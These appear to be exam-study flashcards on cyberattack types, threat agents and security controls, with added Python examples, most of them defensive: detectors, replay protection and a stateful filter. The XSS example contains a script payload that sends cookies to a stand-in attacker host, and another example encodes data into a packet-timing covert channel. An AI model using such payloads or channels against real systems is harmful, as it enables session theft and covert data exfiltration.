ISC S3 Flashcards

(82 cards)

1
Q

Cyberattacks

A

-malicious activity
-targets computer information systems, infrastructures, computer networks or personal computing devices
-attempts to collect, disrupt, deny, degrade or destroy information systems
-directly or indirectly affects the organization, its customers, vendors, etc.

2
Q

Threat agent

A

-an internal or external attacker that could negatively impact data security
-through theft, manipulation or control of sensitive information or systems

3
Q

Type of threat agent: attacker, adversary

A

-attacker: also called a threat actor or hacker
-adversary: an actor whose interests conflict with the organization's and who performs malicious actions against the organization's cyber resources, such as intercepting purchases, stealing data, or tampering with hardware before it is installed

4
Q

Type of threat agent: Government-sponsored/Nation-State Sponsored Actors:

A

They have been known to steal and exfiltrate intellectual property, sensitive information, and even funds to further their nation's espionage objectives.

5
Q

Type of threat agent: Hacktivist

A

-Groups of hackers that operate to promote certain social causes or political agendas
-Operate on a self-proclaimed, relatively moral basis by staying away from certain targets such as hospitals, churches, and other organizations with altruistic purposes or missions

6
Q

Type of threat agent: insider

A

-Employees who organically developed malicious intentions
-Employees who intentionally infiltrated an organization to achieve nefarious objectives

7
Q

External threat

A

-Threats that occur from outside of the organization, entity, or individual that is the target of the cyberattack.

8
Q

Type of cyber attacks:

A

-network-based attacks
-application-based attacks
-host-based attacks
-social engineering attacks
-physical (on-premises) attacks
-supply chain attacks

9
Q

Type of cyber attack: network-based attack

A

-backdoors and trapdoors
-methods of bypassing security access procedures by creating an undocumented entry and exit point into a network or system. They are not attacks on the network in themselves, but they provide an entry point that can be used to execute attacks

-backdoors may be intentionally installed (by an attacker or by a developer for maintenance) or unintentionally left available due to product defects
-trapdoors are often installed by system owners or developers to bypass normal security measures and gain access; when left in production they become an attacker's backdoor

10
Q

Network based attack : covert channel

A

-a communication path that was never intended for transferring data. It violates the entity's security policy but does NOT exceed either party's access authorization, which is why access controls alone do not stop it; data leaks a few bits at a time

-storage channels: the sender modulates some shared storage attribute (a file name, a lock, disk usage, a field in a packet) that a receiver with lower security permission is allowed to read

-timing channels: the sender modulates timing (delays or gaps between packets, CPU load) and the receiver recovers data by measuring it
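An added example (not part of the original cards) of the timing channel just described: a sender encodes bits as short or long gaps between packets, a receiver decodes them from the timestamps alone, and a simple detector looks for the two-cluster gap pattern that such a channel leaves behind. The timestamps are constructed; the gap values and the 10% tightness threshold in the detector are assumptions for the demo.

```python
import statistics

# Added example: a timing covert channel simulated with constructed timestamps.
# The sender leaks bits by choosing the gap between otherwise legitimate packets;
# the receiver needs nothing but arrival times. The gap values are assumptions.
SHORT_GAP = 0.010   # seconds between packets, encodes a 0 bit
LONG_GAP = 0.050    # seconds between packets, encodes a 1 bit
THRESHOLD = (SHORT_GAP + LONG_GAP) / 2


def encode_timing(secret: bytes, start: float = 0.0) -> list:
    """Return packet send times whose inter-arrival gaps carry the secret, MSB first."""
    times = [start]
    for byte in secret:
        for shift in range(7, -1, -1):
            bit = (byte >> shift) & 1
            times.append(times[-1] + (LONG_GAP if bit else SHORT_GAP))
    return times


def decode_timing(times: list) -> bytes:
    """Recover bytes from the gaps between consecutive packet times."""
    bits = [1 if (later - earlier) > THRESHOLD else 0
            for earlier, later in zip(times, times[1:])]
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def looks_like_timing_channel(times: list, min_packets: int = 32) -> bool:
    """Detection heuristic: legitimate inter-arrival gaps are spread continuously,
    while an encoded stream clusters tightly around two values. Split the gaps at
    their mean and flag the stream if both clusters are tight relative to their
    separation. It is a heuristic, so expect false positives on very regular protocols."""
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    if len(gaps) < min_packets:
        return False
    split = statistics.mean(gaps)
    low = [g for g in gaps if g <= split]
    high = [g for g in gaps if g > split]
    if not low or not high:
        return False
    separation = statistics.mean(high) - statistics.mean(low)
    spread = max(statistics.pstdev(low), statistics.pstdev(high))
    return spread < 0.1 * separation


if __name__ == "__main__":
    stream = encode_timing(b"secret42")
    print(decode_timing(stream), looks_like_timing_channel(stream))
```

Real channels add jitter and error correction, and a real detector would compare against a baseline of the protocol's normal gap distribution rather than a fixed ratio; the shape of the problem is the same.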

11
Q

Network based attack: Buffer overflows

A

-the attacker supplies more input than a program's fixed-size buffer (temporary storage) was designed to hold
-the excess overwrites adjacent memory (other variables, return addresses), which can crash the program or corrupt its control flow
-with crafted input the attacker can inject malicious code or redirect execution and take control of the system
-caveat: this is a software defect; it is exploited over the network when the vulnerable program parses network input, but the same bug is exploitable locally. Mitigations such as stack canaries, non-executable memory and ASLR raise the bar but do not remove the bug

12
Q

Network based attack: denial of service ( DoS)

A

-an attacker makes a system or service unavailable to legitimate users, most commonly by flooding its network with more traffic than the bandwidth it was designed to handle, or by exhausting server resources (connection tables, CPU, memory)

13
Q

Network based attack : distributed denial of service (DDoS) attacks

A

-multiple attackers or compromised devices (a botnet) working in unison flood an organization's network with traffic
-harder to block than a traditional DoS attack because the traffic comes from many sources at once, so no single address can simply be filtered

14
Q

Network based attack: man in the middle ( MITM) attack

A

-(eavesdropping)
-the attacker inserts themselves between two parties, intercepting and possibly altering their communications while appearing to each side as the legitimate other party in what looks like a normal secure session

15
Q

Network based attack: port scanning attacks

A

-scanning a network for open ports is frequently done by attackers to identify listening services and vulnerabilities that can be exploited to gain unauthorized access to a company's network

-common weaknesses found this way include:
unsecured or unpatched services and protocols
poor login credentials
poorly configured firewalls (ports exposed that should not be reachable)

16
Q

Network based attack: ransomware attacks

A

Typically comes in the form of malware that encrypts files or locks a user's or company's operating systems and applications, removing the ability to access data unless a ransom is paid.

17
Q

Network based attack: reverse shell attacks

A

-also referred to as "connect-back shells"

-a compromised victim machine initiates an outbound connection to the attacker from behind the company's firewall. Because outbound traffic is usually permitted while unsolicited inbound connections are blocked, this lets the attacker bypass the firewall and other inbound safeguards and remotely control the victim's machine

18
Q

Network based attack: replay attack

A

-a type of MITM attack in which a cybercriminal eavesdrops on a network communication, captures it, and then "replays" the captured message at a later time to the intended recipient to gain access to the network and the data behind the firewall
-the attacker does not need to decrypt the message: a valid authentication exchange or signed transaction is simply sent again. Defences bind each message to a one-time value (nonce, sequence number or timestamp) that the receiver checks and remembers
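An added example (not from the original cards) contrasting an HMAC scheme that is replayable with one that is not. Both ends are assumed to share the key `KEY` (a constructed demo value); the hardened verifier binds a random nonce and a timestamp into the tag and remembers accepted nonces for the freshness window, so a captured message cannot be submitted twice.

```python
import hashlib
import hmac
import secrets

KEY = b"shared-secret-key"   # constructed demo key, assumed pre-shared by both ends


# Naive scheme: the tag covers only the message body, so a captured
# (message, tag) pair verifies forever. This is what a replay attack needs.
def naive_sign(msg: bytes) -> bytes:
    return hmac.new(KEY, msg, hashlib.sha256).digest()


def naive_verify(msg: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(naive_sign(msg), tag)


class NonceProtectedMac:
    """Hardened scheme: nonce and timestamp are part of the authenticated data,
    and the verifier refuses nonces it has already accepted within the window."""

    def __init__(self, window_seconds: int = 300):
        self.window = window_seconds
        self.seen = {}               # nonce -> timestamp at which it was accepted

    def _mac(self, msg: bytes, nonce: bytes, ts: int) -> bytes:
        data = nonce + ts.to_bytes(8, "big") + msg
        return hmac.new(KEY, data, hashlib.sha256).digest()

    def sign(self, msg: bytes, now: int):
        """Sender side: fresh random nonce, current time, tag over all three."""
        nonce = secrets.token_bytes(16)
        return nonce, now, self._mac(msg, nonce, now)

    def verify(self, msg: bytes, nonce: bytes, ts: int, tag: bytes, now: int) -> bool:
        if abs(now - ts) > self.window:
            return False             # stale: outside the freshness window
        if not hmac.compare_digest(self._mac(msg, nonce, ts), tag):
            return False             # forged or tampered
        if nonce in self.seen:
            return False             # replay: this nonce was already accepted
        self.seen[nonce] = ts
        # drop nonces that can no longer pass the freshness check anyway
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        return True


if __name__ == "__main__":
    msg = b"transfer 100 to account 42"
    proto = NonceProtectedMac()
    nonce, ts, tag = proto.sign(msg, now=1000)
    print("first:", proto.verify(msg, nonce, ts, tag, now=1001))
    print("replay:", proto.verify(msg, nonce, ts, tag, now=1002))
```

The timestamp bounds how long the verifier must remember nonces; without it the seen-set would grow without limit, and without the nonce a message could be replayed anywhere inside the window.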

19
Q

Network based attack: return-oriented attack

A

-return-oriented programming (ROP): after corrupting the stack (for example through a buffer overflow), the attacker overwrites return addresses so that execution chains through short instruction sequences ("gadgets") that already exist in the program or its libraries, each ending in a return instruction
-no new code is injected, which is how it bypasses non-executable memory protections (DEP/NX); address space layout randomization (ASLR) and control-flow integrity make gadget addresses harder to predict or use

20
Q

Network based attack: spoofing

A

-the act of impersonating someone or something to obtain unauthorized system access, either by using falsified credentials or by imitating a legitimate person or entity with fake IP addresses, domains, or email addresses

21
Q

Network based attack: types of spoofing

A

-Address Resolution Protocol (ARP) spoofing: devices on a local network learn which MAC address belongs to which IP address through ARP replies, which are not authenticated. An attacker who sends forged ARP replies poisons that mapping so that traffic meant for the gateway or another host is delivered to the attacker's machine, where it can be read, altered, or redirected

-DNS spoofing: a company's DNS server translates domain names to IP addresses. If an attacker tampers with that mapping (poisoned cache, rogue resolver) so that a legitimate name resolves to the attacker's IP address hosting a mimicked website, the victim may enter usernames, passwords and other sensitive information, or download a malicious application from the fake site

-hyperlink spoofing: the visible text of a link (or the URL it appears to show) differs from the address the link actually opens, so the victim believes they are going to a trusted site
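An added example (not from the original cards) of the detection side of ARP spoofing: logic in the style of arpwatch run over a constructed sample of ARP replies seen on one LAN segment. It flags an IP whose MAC differs from the one first learned for it, and a MAC that claims more IPs than a normal host would, which is the pattern of an attacker poisoning both the gateway's and a victim's entries. All addresses are made up.

```python
from collections import defaultdict

# Added example: ARP poisoning detection over a constructed sample of ARP replies,
# each recorded as (time, sender IP, sender MAC). Addresses are made up.
SAMPLE_ARP_REPLIES = [
    (1.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),     # default gateway answers normally
    (2.0, "10.0.0.20", "aa:aa:aa:aa:aa:20"),
    (3.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    (9.0, "10.0.0.1", "de:ad:be:ef:00:99"),     # a new MAC now claims the gateway IP
    (9.5, "10.0.0.20", "de:ad:be:ef:00:99"),    # ...and a host IP: both sides of a MITM
    (10.0, "10.0.0.30", "aa:aa:aa:aa:aa:30"),
]


def detect_arp_spoofing(replies, max_ips_per_mac: int = 1):
    """Flag (a) an IP whose MAC differs from the first MAC learned for it and
    (b) a MAC that claims more IPs than a normal host would."""
    first_mac = {}                      # ip -> MAC learned first
    ips_by_mac = defaultdict(set)       # mac -> set of IPs it has claimed
    alerts = []
    for t, ip, mac in replies:
        known = first_mac.setdefault(ip, mac)
        if known != mac:
            alerts.append((t, "ip-mac-change", ip, known, mac))
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > max_ips_per_mac:
                alerts.append((t, "mac-claims-multiple-ips", mac, sorted(ips_by_mac[mac])))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print(alert)
```

Legitimate MAC changes (a replaced NIC, DHCP handing an address to a different device) produce the same first alert, so in practice the gateway's entry is pinned statically or protected with the switch's dynamic ARP inspection, and the detector's output is triaged rather than acted on blindly.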

22
Q

application-based attack

A

-target specific software or applications (desktop or web) such as databases or websites to gain

23
Q

application-based attack: SQL injection

A

-the attacker supplies input (a form field, URL parameter, cookie) that the application pastes directly into the text of a SQL query, so the input is parsed as SQL rather than as data; this lets the attacker read, modify or delete the company's data or bypass authentication
-the fix is to keep data out of the query text: parameterized queries (prepared statements), least-privilege database accounts, and input validation as defence in depth

24
Q

application-based attack: cross-site scripting (XSS)

A

-similar to SQL injection in that untrusted input is mixed into output without being encoded, but here the attacker injects script into pages served by the company's website, and the script runs in the browsers of users who visit the site (stealing sessions, capturing keystrokes, defacing pages)
-reflected XSS echoes the payload from a request; stored XSS saves it (a comment, a profile field) and serves it to every visitor
-the fix is output encoding appropriate to the context the data lands in (HTML text, attribute, URL), plus a content security policy as defence in depth
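An added example (not from the original cards) of reflected XSS in a tiny constructed page template, beside the escaped version, and a reminder that escaping is context-specific: a `javascript:` URL placed in an `href` survives HTML escaping, so link targets need a scheme allowlist as well. The `contains_script_tag` check exists only to make the outcome observable in code.

```python
import html
import re
from urllib.parse import urlparse

# Added example: reflected XSS in a constructed page template.
PAGE_TEMPLATE = "<html><body><h1>Search results for: {query}</h1></body></html>"


def render_vulnerable(query: str) -> str:
    # Reflects the raw request parameter into the page body.
    return PAGE_TEMPLATE.format(query=query)


def render_safe(query: str) -> str:
    # Encode for the HTML text context before interpolation: < > & " ' become entities.
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True))


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_tag(page: str) -> bool:
    """Crude check used only to make the demo's outcome observable."""
    return bool(SCRIPT_TAG.search(page))


def safe_href(url: str) -> str:
    """Escaping alone does not neutralise javascript: in an href attribute,
    because the browser runs it after decoding entities. Allow only http(s)
    and escape the survivor for the attribute context."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


if __name__ == "__main__":
    payload = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
    print(render_vulnerable(payload))
    print(render_safe(payload))
    print(safe_href("javascript:alert(1)"))
```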

25
application-based attack-race condition
An attacker exploits a system or application that relies on a specific sequence of operations. By forcing the application to perform two or more operations out of order or simultaneously (for example, a "check" and the "act" that depends on it), an attacker may gain unauthorized access or execute a fraudulent act such as spending the same balance twice. Also known as a time-of-check to time-of-use (TOCTOU) flaw.
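An added example (not from the original cards) of the check-then-act race on a constructed account balance: two threads each see enough balance, then both debit, and the account goes negative. The safe version holds a lock across the check and the debit so the two operations are atomic. The `delay` argument widens the race window so the outcome is reproducible; in real systems the window is microseconds but it is still there.

```python
import threading
import time


# Added example: a check-then-act race on a constructed account balance.
class Account:
    def __init__(self, balance: int):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_unsafe(self, amount: int, delay: float) -> bool:
        if self.balance >= amount:          # time of check
            time.sleep(delay)               # window in which another thread can pass the same check
            self.balance -= amount          # time of use: acts on a stale check
            return True
        return False

    def withdraw_safe(self, amount: int, delay: float) -> bool:
        with self.lock:                     # check and act form one atomic unit
            if self.balance >= amount:
                time.sleep(delay)
                self.balance -= amount
                return True
            return False


def run_concurrent(withdraw, amount: int, workers: int = 2, delay: float = 0.05) -> list:
    """Start `workers` threads that all try the same withdrawal at once."""
    results = []

    def worker():
        results.append(withdraw(amount, delay))

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def demo(safe: bool) -> tuple:
    """Two concurrent withdrawals of 75 from a balance of 100.
    Returns (final balance, number of withdrawals that reported success)."""
    acct = Account(100)
    withdraw = acct.withdraw_safe if safe else acct.withdraw_unsafe
    results = run_concurrent(withdraw, 75)
    return acct.balance, sum(results)


if __name__ == "__main__":
    print("unsafe:", demo(safe=False))   # expected (-50, 2): double spend
    print("safe:  ", demo(safe=True))    # expected (25, 1): second withdrawal refused
```

In a database the equivalent fix is a single conditional `UPDATE ... WHERE balance >= ?` or a row lock inside one transaction; on a filesystem it is operating on an opened file descriptor rather than re-resolving a path after checking it.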
26
application-based attack: mobile code
-mobile code is code that is transmitted across a network and executed on the receiving host (scripts, applets, macros, browser plug-ins) -malicious mobile code includes viruses, such as: overwrite viruses (replace the host file's contents), multipartite viruses (infect both boot sectors and files), parasitic viruses (attach to executable files and run when the host program runs)
27
Host-base attacks
-target a single host, such as a laptop, mobile device, or server, to disrupt its functionality or obtain unauthorized access
28
Host-based attacks: Brute force attacks
-the attacker uses an automated program that tries many passwords (dictionary words, leaked credentials, or every possible combination) until one is accepted -countered by account lockout or rate limiting, multifactor authentication, and storing passwords with a slow salted hash so offline guessing is expensive
29
Host-based attack: Keystroke logging
-recording the sequence of keys a user presses on the keyboard (through software or a hardware device) to collect confidential data such as usernames, passwords, and personal information
30
Host-based attack Malware
- example: viruses, worms, Trojan horses, adware, spyware, and other code-based programs that infect a host.
31
Host-based attack: rogue mobile apps
Involves the use of a malicious app that appears legitimate. A fraudulent party creates a mobile application that an unsuspecting victim installs; the app then steals information, gives the attacker unauthorized access, or executes some other malicious act.
32
Social engineering attack
-involves the use of psychological manipulation or deception to get employees to divulge sensitive information, provide unauthorized access, or assist an attacker in committing fraud
33
Social engineering attack: phishing
Uses authentic-looking but fake emails that request information from users or direct them to a fake website that requests information. Tell-tale signs include links whose visible text does not match the real destination, bare IP addresses or look-alike domains in links, and urgency pressure.
34
Social engineering attack: spear phishing
This form of phishing targets employees in a corporate entity by posing as a legitimate department or employee, such as human resources or the IT director. The goal is to obtain confidential information such as usernames, passwords, or personal data that can be used for exploitation.
35
Social engineering attack: Business email compromise
-a form of phishing that targets executives and other high-ranking individuals, or impersonates them to their staff -typically involves schemes to get the target to: transfer money by wire; pay fake foreign suppliers; send sensitive data to someone impersonating an attorney or another employee -closely related to whaling, the term for phishing aimed specifically at executives; the two terms are often used together
36
Social engineering attack: Pretexting
-This attack is similar to BEC and spear phishing, but it involves creating a fake identity or scenario so that the employee has a sense of urgency to act
37
Social engineering attack: Catfishing
Involves the creation of a fake online persona that is used to lure a victim into a personal relationship with a fraudster.
38
social engineering attack: pharming
-redirecting users to a fraudulent website even when they type or follow the correct address -the link to the fraudulent site may arrive in a phishing email, but the scheme may also involve manipulating Domain Name System (DNS) servers or the victim's hosts file so that the legitimate URL resolves to the attacker's server
39
social engineering attack: Vishing
-fraudulent schemes conducted over the telephone system, usually voice over internet protocol (VoIP) -normally involves a spoofed caller ID that appears to belong to a legitimate business or person
40
Physical ( on-premises) attack
-attacks that require physical presence or access to the organization's premises or equipment -one form is recovering data from outdated or discarded equipment found in the trash or obtained through companies that accept discarded equipment (media that was never wiped)
41
Physical attack: piggybacking
Involves an attacker using an authorized person's access to gain entrance to a physical location or electronic access.
42
Physical attack: targeted by attackers
On-premises infrastructures are often targets of hacking groups or attackers because they know that many organizations lack sophisticated cybersecurity defenses.
43
physical attack: tampering
Involves gaining physical access to a company's IT infrastructure and modifying the way its network collects, stores, processes, or transmits data. Can be done by physically rewiring cabling, plugging in directly to network equipment, or adding an unauthorized device to the existing network.
44
Supply chain attack : embedded software code
-Involves inserting code into prepackaged software or firmware being sold to a company that later installs the software after purchase
45
Supply chain attack: foreign-sourced attacks
Governments have deep/widespread control of companies in the private sector. Those governments may use products sold to other countries to conduct surveillance or deliver malicious code.
46
supply chain attack: pre-installed malware on hardware
Involves installing malware on devices that will be used by companies in a supply chain, such as USB drives, cameras, or phones. Once the company acquiring the devices connects them to the company's network, the malware executes.
47
supply chain attack : vendor attack
Perpetrated upon key vendors of a target company so that the normal production of goods or business operations is disrupted.
48
Supply chain attack: watering hole attacks
Fraudsters identify websites of suppliers, customers, or regulatory entities that are known to be used by several companies or even entire industries. The attackers then look for weaknesses at that third party that can be used to deliver malware, steal data, or obtain unauthorized access.
49
risk related to cloud computing
1. additional industry exposure
2. cloud malware injection attacks
3. compliance violations: the risk that hosts or service providers do not have the security protocols and procedures in place to meet regulations on privacy and confidentiality
4. loss of data
5. loss of control
6. loss of visibility
7. multi-cloud and hybrid management issues
8. theft or loss of intellectual property: the risk that the service provider lacks sufficient controls over the data, resulting in theft or loss of intellectual property
50
Risk related to mobile technology
1. application malware: occurs when a user downloads an application that appears to be legitimate but is malicious
2. lack of updates
3. lack of encryption
4. physical threats (loss or theft of the device)
5. unsecured Wi-Fi networks
6. location tracking
7. mobile storage devices
51
risk related to the internet of things (IoT)
-the internet of things is the class of smart devices connected to the internet that provide automation and remote control for other devices in a home or office
1. device mismanagement: insufficient password control
2. device spoofing: an attacker creates an illegal or fake device and introduces it to a company's network, posing as a legitimate device to gain information or access to that network
3. escalated cyberattacks: IoT devices can be used as a base from which to infect more machines
4. expanded footprint: more devices means more points exposed to attack
5. information theft
6. outdated firmware
7. malware
8. network attacks: compromised devices overburden a network with traffic
52
three control objectives of the COSO internal control framework
-operations objectives
-reporting objectives
-compliance objectives
53
five component of COSO internal control framework
-control environment
-risk assessment
-control activities
-information and communication
-monitoring activities
54
Security policies, standards, and procedures
-security policies: uppermost level; an overview of the organization's security needs and strategic plan
-standards: middle level; used as benchmarks to accomplish the goals defined by the security policies
-procedures: bottom level; standard operating procedures (SOPs), typically detailed documents
55
Type of security policies
-acceptable use policy (AUP): protects technology resources; users are asked to sign it before being granted access to the system
-mobile device security policies: usually stipulate password protection rules, multifactor authentication requirements, any required encryption, web browsing rules, parameters for connecting to public networks, and rules for other applications or file downloads on the devices
-bring your own device (BYOD) policies: allow employees to use personally owned devices for work-related activities and to connect to the company's network. They address:
a. monitoring and enforcement actions on personal devices (prevent intrusion by malicious actors, but also set a standard for respecting employee privacy)
b. the company owns the data on the device, not the employee
c. who is responsible for compensating losses in the event the employee or the company is assigned blame
d. restricted activities and application downloads on personal devices
56
Network security method
-network segmentation or isolation: parts of the network are inaccessible to, or separated from, outside communications
-firewalls
-service set identifier (SSID): the name of a wireless network; disabling SSID broadcast hides the name from casual discovery, but the name still appears in client traffic, so this is obscurity rather than a strong control
-VPN: a virtual network built on top of an existing physical network that provides secure communication using encryption protocols (tunneling and Internet Protocol Security (IPsec))
-Wi-Fi Protected Access (WPA): a security protocol designed to protect wireless networks by encrypting the data sent over them; WPA2 and WPA3 are the current versions, while the original WPA and WEP are broken and should not be used
-endpoint security: antivirus and malware screening software, auditing software
-system hardening
-media access control (MAC) filtering: an access point blocks unauthorized devices using a list of approved MAC addresses; easily bypassed because MAC addresses are visible in wireless traffic and can be cloned, so it belongs alongside, not instead of, WPA2/WPA3 authentication
57
Zero trust
-assume the company's network is always at risk -continuous validation at every point of user's interaction with network
58
Least privilege
-users and systems are granted only the minimum authorization and system resources needed to do their job -common violation: when a user moves to a new role, permissions for the new role are granted but access from the prior role is never removed (privilege creep) -differs from need to know, which focuses on the data an individual needs to see, whereas least privilege covers all access and actions needed to perform the job
59
whitelisting/ allow listing
-Whitelisting is the process of identifying a list of applications that are Authorized to run on an organization's systems and only allowing those programs to execute -Similarly, Blacklisting/Deny listing is identifying a list of applications NOT Authorized on a network and preventing those from running.
59
Need to know ( data only )
-focuses on the data itself that is needed to perform the job
60
Preventive control
-safeguarding practices
-education and training
-regular security updates
-encryption
-firewalls
-patches: an update or modification to an existing software program
-physical barriers
-device and software hardening: minimizing the number of vulnerabilities across hardware devices and software applications prevents some attacks from occurring, for example removing a user's right to install software on their device
-intrusion prevention system (IPS): similar to a firewall, but matches traffic against attack signatures and blocks matches in line
61
Preventive control: access control -authorization model
-discretionary access control (DAC): decentralized; allows data owners, custodians or creators to manage access to their own resources
-mandatory access control (MAC, non-discretionary): centrally managed; access is not based on identity but on a general set of rules (labels and clearances) that governs the entire system
-role-based access control (RBAC): access is granted according to the user's job role
-rule-based access control: access is managed according to a predetermined set of rules
-policy-based access control (PBAC): decisions evaluate written policies that combine attributes of the user, the resource, the action and the environment; more flexible than a fixed rule list
-risk-based access control: when the assessed risk is high, stricter measures such as multifactor authentication are required
62
Access control list ( ACL)
-outlines which users (or addresses) have permission to access certain resources
-filesystem ACLs
-network ACLs: used not only for controlling access but also for improving network performance by restricting or channeling the flow of data
63
Access control list ( ACL) vs firewall
-both filter traffic on a network
-ACLs are generally used to manage user access and permissions
-firewalls are intended to protect the organization from malicious attacks
64
Stateful ACL
-a traditional (stateless) ACL judges each packet on its own headers (source and destination addresses, ports, protocol) with no memory of earlier packets, so it cannot tell whether an inbound packet is the reply to a connection an inside host opened or an unsolicited probe
-a stateful ACL (stateful firewall filtering) applies the same predefined rules but also tracks the state of active connections, so return traffic for an outbound session can be allowed without a blanket inbound rule
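An added example (not from the original cards) simulating the two filters over a constructed packet stream. To let HTTPS replies back in, the stateless ACL has to trust "source port 443", which an attacker can set on any packet; the stateful filter admits an inbound packet only if it matches a connection it saw leave. Addresses and ports are made up.

```python
import ipaddress

# Added example: stateless ACL vs stateful filtering over constructed packets.
INTERNAL = ipaddress.ip_network("10.0.0.0/8")

# (direction, src_ip, src_port, dst_ip, dst_port)
PACKETS = [
    ("out", "10.0.0.5", 51000, "198.51.100.10", 443),   # client opens an HTTPS session
    ("in", "198.51.100.10", 443, "10.0.0.5", 51000),    # the server's reply
    ("in", "203.0.113.9", 443, "10.0.0.5", 3389),       # unsolicited RDP probe, source port forged to 443
]


def stateless_acl(pkt) -> bool:
    """Each packet is judged alone. The inbound rule needed for replies
    ('anything from port 443 to the inside') also admits the forged probe."""
    direction, src, sport, dst, dport = pkt
    if direction == "out" and ipaddress.ip_address(src) in INTERNAL and dport == 443:
        return True
    if direction == "in" and sport == 443 and ipaddress.ip_address(dst) in INTERNAL:
        return True
    return False


class StatefulFilter:
    def __init__(self):
        self.table = set()   # (inside_ip, inside_port, remote_ip, remote_port) of allowed sessions

    def decide(self, pkt) -> bool:
        direction, src, sport, dst, dport = pkt
        if direction == "out":
            if ipaddress.ip_address(src) in INTERNAL and dport == 443:
                self.table.add((src, sport, dst, dport))
                return True
            return False
        # inbound: admitted only as the reverse of a session that left through us
        return (dst, dport, src, sport) in self.table


def run(filter_fn, packets) -> list:
    return [filter_fn(p) for p in packets]


if __name__ == "__main__":
    print("stateless:", run(stateless_acl, PACKETS))
    print("stateful: ", run(StatefulFilter().decide, PACKETS))
```

Real stateful devices also time entries out, follow TCP flags, and handle protocols whose data channels use negotiated ports (FTP, SIP) with helpers; the table lookup above is the core idea.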
65
detective control
-detect a threat while it is occurring and provide evidence for investigations and audits after the event has occurred
66
Type of detective control
-network intrusion detection system (NIDS): monitors incoming traffic for all devices on a network by matching specific elements of that traffic to a library of known attacks and sending alerts when events meeting predefined criteria are detected
-antivirus software monitoring: antivirus software scans files in real time and compares them to a library of known viruses
-network monitoring tools: packet sniffers, network performance monitoring (NPM), Simple Network Management Protocol (SNMP)
-log analysis
-intrusion detection system (IDS)
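An added example (not from the original cards) of the log analysis control: a parser for sshd-style authentication lines and a sliding-window detector that raises a brute-force alert when one source IP accumulates five failures inside 60 seconds, and escalates if that IP then logs in successfully. The log lines, addresses and thresholds are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Added example: brute-force detection over constructed sshd-style log lines.
SAMPLE_AUTH_LOG = """\
2024-05-01T10:00:01 sshd[912]: Failed password for invalid user admin from 198.51.100.23 port 40112 ssh2
2024-05-01T10:00:03 sshd[912]: Failed password for root from 198.51.100.23 port 40114 ssh2
2024-05-01T10:00:04 sshd[912]: Failed password for root from 198.51.100.23 port 40115 ssh2
2024-05-01T10:00:06 sshd[912]: Failed password for root from 198.51.100.23 port 40118 ssh2
2024-05-01T10:00:07 sshd[912]: Failed password for root from 198.51.100.23 port 40120 ssh2
2024-05-01T10:00:09 sshd[912]: Accepted password for root from 198.51.100.23 port 40121 ssh2
2024-05-01T10:05:00 sshd[913]: Failed password for alice from 10.0.0.7 port 50000 ssh2
2024-05-01T10:05:30 sshd[913]: Accepted publickey for alice from 10.0.0.7 port 50001 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)


def parse(log_text: str) -> list:
    """Return (timestamp, result, user, ip) for every line the pattern recognises."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold: int = 5, window_seconds: int = 60) -> list:
    """Sliding window of failures per source IP. A success from an IP that was
    already flagged is the signal worth paging on: the guessing may have worked."""
    failures = defaultdict(list)
    flagged = set()
    alerts = []
    for ts, result, user, ip in events:
        if result == "Failed":
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, len(recent)))
        elif result == "Accepted" and ip in flagged:
            alerts.append(("success-after-bruteforce", ip, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse(SAMPLE_AUTH_LOG)):
        print(alert)
```

Distributed attacks spread guesses across many IPs and stay under a per-IP threshold, so a second view keyed by target account (failures per user across all sources) belongs beside this one in a SIEM rule set.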
67
Corrective control
-fix known vulnerabilities
-reconfigurations: revamping firewall rules, retooling an operating system's settings, and altering access control settings
-upgrades and patches
-revised policies and procedures
-updated employee training
-virus quarantining: isolating actual or suspected viruses removes the threat from the rest of a company's network; usually done automatically by antivirus software, or manually after suspicious activity has been flagged from the review of system logs
-recovery and continuity plans
-antivirus software removal of malicious viruses
68
confidentiality vs privacy
-privacy: protects the rights of an individual and gives the individual control over what information they are willing to share with others
-confidentiality: protects information gathered by the company from unauthorized access
68
obfuscation
-the process of replacing sensitive information with data that is less valuable to an unauthorized user
-tokenization: a sensitive value (such as a card number) is replaced by a surrogate token that has no mathematical relationship to it; the mapping is kept in a separate, protected token vault. Format-preserving tokens keep the same length and character type, so existing systems can store them unchanged; for example 4111111111111111 might become 4111730256481111 with only the last four digits kept
-masking: replacing real information with ** or other symbols (irreversible; typically only the last few characters remain)
-encryption: reversible with the key, so the protection is only as strong as the key management
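An added example (not from the original cards) of a format-preserving token vault beside masking: the token is random digits of the same length with the last four digits retained, the vault keeps the only mapping back to the real value, and masking is one-way. The card number is the standard test value 4111111111111111 and the vault is an in-memory dictionary, which in production would be a separately secured service.

```python
import secrets


# Added example: a constructed token vault and a masking function.
class TokenVault:
    """Format-preserving tokenization: same length and character class as the
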